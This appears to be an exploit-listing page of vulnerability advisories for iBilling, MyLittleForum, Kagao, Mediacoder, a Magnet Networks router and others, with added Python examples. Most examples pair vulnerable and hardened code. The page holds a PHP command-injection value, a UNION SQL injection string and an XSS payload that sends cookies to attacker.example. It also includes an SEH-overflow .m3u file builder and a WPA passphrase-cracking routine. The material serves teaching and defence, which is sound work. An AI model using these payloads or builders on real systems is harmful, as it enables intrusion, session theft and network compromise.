Explore all Exploits:

iBilling v3.7.0 Multiple Stored and Reflected Cross Site Scripting Vulnerabilities

iBilling suffers from multiple stored and reflected cross-site scripting vulnerabilities. Input passed via several parameters is not properly sanitized before it is returned to the user, so an attacker can execute arbitrary HTML and script code in a user's browser session in the context of the affected site.

MyLittleForum PHP Command Execution

When setting up the mylittleforum CMS, users walk through an installation script and provide details for the application such as the forum's email address, name, admin email, admin password, database name and so on. However, the installation script performs no input validation on these values. Low-privileged users can therefore supply arbitrary PHP code as the database name. The value is written verbatim into the config/db_settings.php file, which the application then includes and executes. Because the supplied database name is invalid a MySQL error is thrown, but the injected PHP payload is still executed on the host. If the CMS is installed by a low-privileged user who has only the basic MySQL authorization needed to run the installer, this can result in privilege escalation, remote command execution and complete takeover of the host server.
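As an added illustration (not code from mylittleforum) of the config-file injection described above, the following Python renders installer values into a db_settings.php-style file, first verbatim and then with identifier validation plus proper PHP string escaping. The template, the payload and the small statement splitter used to count what the generated file really contains are all constructed for this example.

```python
import re

# Constructed stand-in for an installer writing the database settings it
# received from the web form into a PHP file that the application includes.
TEMPLATE_UNSAFE = "<?php\n$db_name = '{db}';\n$db_user = '{user}';\n"

# Constructed payload: closes the PHP string literal, appends a statement,
# then comments out the remainder of the original line.
PAYLOAD = "x'; system($_GET['cmd']); //"


def render_settings_unsafe(db_name: str, db_user: str) -> str:
    """Vulnerable: form values are dropped into PHP string literals verbatim.
    A quote in the value ends the literal and whatever follows is parsed
    as PHP the next time the settings file is included."""
    return TEMPLATE_UNSAFE.format(db=db_name, user=db_user)


def is_valid_db_name(name: str) -> bool:
    """Allow-list the database name as a plain identifier (letters, digits,
    underscore and dollar, at most 64 characters); anything else is rejected
    rather than escaped."""
    return re.fullmatch(r"[A-Za-z0-9_$]{1,64}", name) is not None


def php_single_quoted(value: str) -> str:
    """Emit a PHP single-quoted literal. Inside single quotes only backslash
    and the quote itself are special, so escaping those two is sufficient."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def render_settings_safe(db_name: str, db_user: str) -> str:
    """Hardened: validate the identifier, escape every free-form value."""
    if not is_valid_db_name(db_name):
        raise ValueError("invalid database name: %r" % db_name)
    return "<?php\n$db_name = %s;\n$db_user = %s;\n" % (
        php_single_quoted(db_name),
        php_single_quoted(db_user),
    )


def try_render_safe(db_name: str, db_user: str):
    """Return the rendered file, or None when the input is rejected."""
    try:
        return render_settings_safe(db_name, db_user)
    except ValueError:
        return None


def php_statements(php_source: str) -> list:
    """Split PHP source into top-level statements, honouring single-quoted
    strings (with backslash escapes) and // line comments. The expected
    settings file holds exactly two statements; any extra one came from
    user input breaking out of a literal."""
    body = php_source.split("<?php", 1)[1]
    statements, current, in_string, i = [], [], False, 0
    while i < len(body):
        ch = body[i]
        if in_string:
            current.append(ch)
            if ch == "\\" and i + 1 < len(body):
                current.append(body[i + 1])
                i += 1
            elif ch == "'":
                in_string = False
        elif ch == "'":
            in_string = True
            current.append(ch)
        elif body.startswith("//", i):
            i = body.find("\n", i)
            if i == -1:
                break
            continue
        elif ch == ";":
            statements.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
        i += 1
    tail = "".join(current).strip()
    if tail:
        statements.append(tail)
    return [s for s in statements if s]


if __name__ == "__main__":
    print(php_statements(render_settings_unsafe(PAYLOAD, "forum")))
    print(php_statements(render_settings_safe("forum", PAYLOAD)))
```

The vulnerable render turns two intended assignments into three statements, the middle one being the attacker's system() call; the hardened render rejects the payload as a database name outright and, where a free-form value such as the user name must be accepted, keeps it inside one escaped literal.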

Panda Security Privilege Escalation

Multiple Panda Security products are vulnerable to local privilege escalation. The USERS group has write permission on the folder containing the PSEvents.exe process, so it is possible to execute malicious code as Local System. A local user can exploit this by placing a malicious DLL in that directory, named after one of the DLLs that PSEvents.exe tries to load but cannot find. After one hour, PSEvents.exe is executed and the malicious DLL is loaded.

Kagao v3.0 – Professional Classified Market SQL Injection & Cross Site Scripting

Kagao v3.0 - Professional Classified Market is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this to manipulate queries by injecting arbitrary SQL, which may allow reading or modifying data in the back-end database, compromising the application, or gaining a foothold for further attacks. Cross-site scripting (XSS) vulnerabilities also exist because user-supplied data is not properly sanitized before being used in the application's dynamic content. An attacker can exploit these to execute arbitrary HTML and script code in the context of the affected site, steal cookie-based authentication credentials, and control how the site is rendered to the user; other attacks are also possible.
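The two issue classes named for Kagao above, and the reflected XSS in the iBilling entry, come down to the same mistake of passing untrusted input through unchanged. As an added example (not code from either product), the following Python shows a classifieds search with string-built and parameterised SQL side by side, then the same result page rendered with and without HTML output encoding. The in-memory SQLite table, its rows and both payloads are constructed for this example.

```python
import html
import sqlite3

# Constructed sample: a classifieds table with a column the public search
# is never supposed to return.
ADS = [
    ("Bike for sale", "alice", "alice-private-phone"),
    ("Old laptop", "bob", "bob-private-phone"),
]

# Constructed payloads.
SQLI = "' UNION SELECT id, contact FROM ads --"
XSS = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE ads (id INTEGER PRIMARY KEY, title TEXT, owner TEXT, contact TEXT)"
    )
    conn.executemany("INSERT INTO ads (title, owner, contact) VALUES (?, ?, ?)", ADS)
    return conn


def search_unsafe(conn, term: str):
    """Vulnerable: the search term is concatenated into the statement, so a
    quote in the term ends the string and the rest is parsed as SQL."""
    sql = "SELECT id, title FROM ads WHERE title LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term: str):
    """Parameterised: the term travels as a bound value, never as SQL text.
    LIKE wildcards in the term still act as wildcards, which is a search
    feature, not an injection."""
    return conn.execute(
        "SELECT id, title FROM ads WHERE title LIKE ?", ("%" + term + "%",)
    ).fetchall()


def render_unsafe(term: str, rows) -> str:
    """Vulnerable: the term and the stored titles are reflected into HTML
    unescaped, so both reflected and stored XSS are possible."""
    items = "".join("<li>%s</li>" % title for _, title in rows)
    return "<p>Results for %s</p><ul>%s</ul>" % (term, items)


def render_safe(term: str, rows) -> str:
    """Context-appropriate output encoding for HTML element content."""
    items = "".join("<li>%s</li>" % html.escape(title) for _, title in rows)
    return "<p>Results for %s</p><ul>%s</ul>" % (html.escape(term), items)


def leaked_contacts(rows) -> set:
    """Which private contact values ended up in a public result set."""
    contacts = {contact for _, _, contact in ADS}
    return {value for _, value in rows if value in contacts}


if __name__ == "__main__":
    conn = make_db()
    print(leaked_contacts(search_unsafe(conn, SQLI)))   # both private numbers
    print(search_safe(conn, SQLI))                      # []
    print(render_safe(XSS, search_safe(conn, "bike")))
```

The UNION payload rides in through the LIKE clause and pulls the contact column into the public results; the same string bound as a parameter simply matches nothing. On the output side, html.escape turns the script tag into inert text whether it arrived in the query string (reflected) or in a stored title.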

Mediacoder 0.8.43.5830 – Buffer Overflow SEH Exploit (.m3u)

Mediacoder 0.8.43.5830 contains a buffer overflow that overwrites the Structured Exception Handler (SEH) chain. It is triggered when a specially crafted .m3u file is opened. The exploit uses 0x64f03994 in swscale-3.dll as the SEH handler address and places a NOP sled followed by shellcode that launches calc.exe.
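An added example of how such an SEH-overwrite file is assembled, written here in Python and not taken from the advisory's own exploit: a builder that lays out junk, nSEH, SEH and the sled plus payload, with the checks a practitioner runs before committing to an address. The 0x64f03994 handler address is the one given above; the offset to the SEH record, the total file size and the INT3 bytes standing in for the calc.exe shellcode are assumptions for illustration.

```python
import struct

SEH_HANDLER = 0x64F03994     # handler address in swscale-3.dll from the advisory
OFFSET_TO_SEH = 1000         # assumed: find the real offset with a cyclic pattern
NSEH = b"\xeb\x06\x90\x90"   # short jmp +6 over the SEH record, padded with nops
NOP_SLED = b"\x90" * 16
SHELLCODE = b"\xcc" * 32     # placeholder INT3s, not the advisory's calc.exe payload
M3U_BAD_CHARS = {0x00, 0x0A, 0x0D}  # a line-oriented playlist parser stops on these


def build_m3u(offset=OFFSET_TO_SEH, handler=SEH_HANDLER,
              shellcode=SHELLCODE, total=2000) -> bytes:
    """Overflow layout: junk up to the SEH record, then nSEH (a forward jump),
    then the handler address the exception dispatcher will call. A pop/pop/ret
    at that address returns into nSEH, which jumps over the record into the
    sled and from there into the shellcode."""
    seh = struct.pack("<I", handler)
    buf = b"A" * offset + NSEH + seh + NOP_SLED + shellcode
    if len(buf) > total:
        raise ValueError("payload does not fit in %d bytes" % total)
    return buf + b"D" * (total - len(buf))


def contains_bad_chars(data: bytes, bad=M3U_BAD_CHARS) -> bool:
    """Reject any byte the target's parser would truncate or translate;
    an address with a null or newline byte in it is unusable here."""
    return any(b in bad for b in data)


def seh_record_offset(buf: bytes, handler=SEH_HANDLER):
    """Confirm where the packed handler address landed, or None."""
    idx = buf.find(struct.pack("<I", handler))
    return None if idx == -1 else idx


def write_m3u(path: str, data: bytes) -> int:
    with open(path, "wb") as fh:
        return fh.write(data)


if __name__ == "__main__":
    payload = build_m3u()
    if contains_bad_chars(payload):
        raise SystemExit("bad characters in buffer")
    print("SEH record at offset", seh_record_offset(payload))
    write_m3u("crash.m3u", payload)
```

The little-endian encoding of 0x64f03994 is 94 39 f0 64, which contains none of the playlist-hostile bytes, so the address survives the parser; the same check is what rules out many otherwise usable pop/pop/ret gadgets.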

Option CloudGate Insecure Direct Object References Authorization Bypass

Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input without checking that the requester is authorized to reach them. As a result of this vulnerability in Option CloudGate, attackers can bypass authorization and directly access resources and functionality in the system, such as APIs, files, upload utilities and device settings.
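As an added example (not CloudGate code), the following Python shows the pattern in miniature: an accessor that trusts the object id from the request, the same accessor with an ownership check, and the indirect-reference map that the name of the vulnerability class alludes to, where clients only ever hold opaque per-user tokens. The settings records and user names are constructed.

```python
import secrets

# Constructed device-settings records keyed by their database id.
SETTINGS = {
    101: {"owner": "alice", "admin_password": "alice-secret"},
    102: {"owner": "bob", "admin_password": "bob-secret"},
}


class Forbidden(Exception):
    """Raised for both missing and foreign records so the error does not
    tell an attacker which ids exist."""


def get_settings_unsafe(user: str, settings_id: int) -> dict:
    """Vulnerable: the id from the request selects the record directly and
    the caller's identity is never consulted."""
    return SETTINGS[settings_id]


def get_settings_safe(user: str, settings_id: int) -> dict:
    """Still a direct reference, but with an ownership check on every access."""
    record = SETTINGS.get(settings_id)
    if record is None or record["owner"] != user:
        raise Forbidden()
    return record


class ReferenceMap:
    """Indirect references: the server mints opaque tokens per user for the
    objects that user may reach, so there is no id to guess or increment."""

    def __init__(self):
        self._refs = {}  # (user, token) -> object id

    def issue(self, user: str, object_id: int) -> str:
        token = secrets.token_urlsafe(16)
        self._refs[(user, token)] = object_id
        return token

    def resolve(self, user: str, token: str):
        """Object id, or None when the token was not issued to this user;
        a token leaked from one session is useless in another."""
        return self._refs.get((user, token))


def get_settings_indirect(refs: ReferenceMap, user: str, token: str) -> dict:
    object_id = refs.resolve(user, token)
    if object_id is None:
        raise Forbidden()
    return get_settings_safe(user, object_id)


def access(fn, *args):
    """Run an accessor and return its record, or None if access was denied."""
    try:
        return fn(*args)
    except (Forbidden, KeyError):
        return None


def demo_indirect():
    """Mint bob a token for his record, then use it as bob and as alice."""
    refs = ReferenceMap()
    token = refs.issue("bob", 102)
    return (access(get_settings_indirect, refs, "bob", token),
            access(get_settings_indirect, refs, "alice", token))
```

Note that the indirect map does not replace the ownership check; get_settings_indirect still calls get_settings_safe, because the token only limits what a client can name, while the check decides what the server will hand over.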

Codoforum v3.4 Stored Cross-Site Scripting (Stored XSS)

The reply and search functionalities are both vulnerable to stored XSS because the content of replies is not properly filtered when it is displayed. To reproduce: log into an account, open any topic and post a reply that contains an XSS payload alongside a commonly used keyword; when any user views the topic or searches for that keyword, the JavaScript executes in their browser.

Magnet Networks – Weak WPA-PSK passphrases used in Tesley CPVA 642 Router

The Tesley CPVA 642 routers supplied by Magnet Networks are vulnerable to an offline dictionary attack once an attacker has captured the WPA-PSK handshake. The WPA-PSK passphrase has the following structure: it starts with MAGNET0, followed by six random decimal digits, giving 1 million possible combinations (MAGNET0000000 - MAGNET0999999). The entire keyspace can be generated with the mask processor by atom and written out to a wordlist. Using a 1.4 GHz i3 processor on a budget laptop, we were hitting 1,000 keys per second, so the whole keyspace takes under 17 minutes. The WPA-PSK handshake we used had the password MAGNET0349325 and was cracked within ~6 minutes.
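An added example (not the advisory's tooling) in Python: enumerating the MAGNET0 keyspace in the order a mask would, working out how far into it a given passphrase sits at the quoted 1,000 keys/s, and deriving the WPA PMK with PBKDF2 so a candidate can be matched against a target. The SSID is constructed; a real crack verifies the handshake MIC rather than a bare PMK, and the loop below is only run over a small slice of the keyspace.

```python
import hashlib

PREFIX = "MAGNET0"
DIGITS = 6
KEYSPACE = 10 ** DIGITS           # 1,000,000 candidates
QUOTED_RATE = 1000                # keys/s on the 1.4 GHz i3 from the advisory
MASK = PREFIX + "?d" * DIGITS     # maskprocessor/hashcat syntax: MAGNET0?d?d?d?d?d?d


def candidates(start=0, stop=KEYSPACE):
    """Yield passphrases in mask order, MAGNET0000000 upward."""
    for n in range(start, stop):
        yield "%s%0*d" % (PREFIX, DIGITS, n)


def candidate_index(passphrase: str):
    """Position of a passphrase in mask order, or None if it does not fit."""
    tail = passphrase[len(PREFIX):]
    if not passphrase.startswith(PREFIX) or len(tail) != DIGITS or not tail.isdigit():
        return None
    return int(tail)


def seconds_to_reach(passphrase: str, rate=QUOTED_RATE) -> float:
    """Sequential search time to hit this passphrase at the given rate."""
    return candidate_index(passphrase) / rate


def worst_case_seconds(rate=QUOTED_RATE) -> float:
    return KEYSPACE / rate


def pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal pairwise master key: PBKDF2-HMAC-SHA1 over the
    passphrase with the SSID as salt, 4096 iterations, 32 bytes. This is the
    per-candidate cost that bounds the cracking rate; the MAGNET0 pattern
    wins by shrinking the number of candidates, not by weakening PBKDF2."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def crack(target_pmk: bytes, ssid: str, candidate_iter):
    """Return the first candidate whose PMK matches, or None."""
    for candidate in candidate_iter:
        if pmk(candidate, ssid) == target_pmk:
            return candidate
    return None


if __name__ == "__main__":
    print(MASK, "worst case %.0f s" % worst_case_seconds())
    print("MAGNET0349325 reached after %.0f s" % seconds_to_reach("MAGNET0349325"))
```

At 1,000 keys/s the advisory's passphrase sits 349,325 candidates in, or about 349 seconds, which matches the ~6 minutes reported; the worst case for the whole pattern is 1,000 seconds. The same mask handed to hashcat against the captured handshake replaces the toy crack loop.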

WordPress Ultimate Product Catalog v3.8.6 Arbitrary File Upload (RCE)

An arbitrary file upload vulnerability has been detected in the WordPress Ultimate Product Catalogue plugin v3.8.6 and below. It allows remote attackers to upload arbitrary files into the WordPress upload directory, provided the plugin is the premium version and the attacker has an account with a role (contributor, editor, author or administrator) that can manage the plugin.
